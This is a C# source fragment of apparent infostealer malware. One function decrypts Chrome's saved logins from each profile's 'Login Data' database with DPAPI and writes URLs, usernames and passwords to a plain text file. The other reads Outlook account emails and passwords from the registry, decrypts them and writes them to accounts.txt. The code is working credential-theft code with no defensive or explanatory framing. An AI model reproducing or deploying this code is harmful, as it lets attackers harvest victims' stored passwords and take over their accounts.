static void decryptChromePasswords(string cd, string home) { cd += "\\Chrome"; if (Directory.Exists(cd)) { foreach (string profile in Directory.GetDirectories(cd)) { SQLiteConnection conn = new SQLiteConnection("Data Source=" + profile + "\\Login Data"); conn.Open(); SQLiteCommand retrieveData = conn.CreateCommand(); retrieveData.CommandText = "SELECT action_url, username_value, password_value FROM logins"; SQLiteDataReader data = retrieveData.ExecuteReader(); List <string> decryptedData = new List <string>(); while (data.Read()) { string url = (string)data["action_url"]; string username = (string)data["username_value"]; string decryptedPassword = ""; byte[] encryptedPassword = (byte[])data["password_value"]; byte[] outBytes = DPAPI.decryptBytes(encryptedPassword); decryptedPassword = Encoding.Default.GetString(outBytes); if (decryptedPassword != "") { decryptedData.Add(url); decryptedData.Add(username); decryptedData.Add(decryptedPassword); } } File.WriteAllLines(profile + "\\passwords.txt", decryptedData.ToArray()); conn.Close(); } } }
static bool grabOutlookPasswords(string cd, string home) { List <string> accounts = new List <string>(); RegistryKey baseKey = Registry.CurrentUser; RegistryKey profilesKey = baseKey.OpenSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"); string[] profiles = profilesKey.GetSubKeyNames(); foreach (string profile in profiles) { RegistryKey key = profilesKey.OpenSubKey(profile); if (key.SubKeyCount > 0) { string[] subkeys = key.GetSubKeyNames(); foreach (string subkey in subkeys) { RegistryKey key2 = key.OpenSubKey(subkey); byte[] emailBytes = (byte[])key2.GetValue("Email"); if (emailBytes != null) { string email = Encoding.Default.GetString(emailBytes); email = email.Replace("\0", ""); accounts.Add(email); string password; foreach (string passKey in key2.GetValueNames()) { if (passKey.Contains("Password")) { byte[] encryptedPassword = (byte[])key2.GetValue(passKey); if (encryptedPassword[0] == 2) { List <byte> list = new List <byte>(encryptedPassword); list.RemoveAt(0); encryptedPassword = list.ToArray(); } byte[] outBytes = DPAPI.decryptBytes(encryptedPassword); password = Encoding.Default.GetString(outBytes); password = password.Replace("\0", ""); accounts.Add(password); } } } } } } if (accounts.Count > 0) { Directory.CreateDirectory(cd + "\\Outlook"); File.WriteAllLines(cd + "\\Outlook\\accounts.txt", accounts.ToArray()); return(true); } return(false); }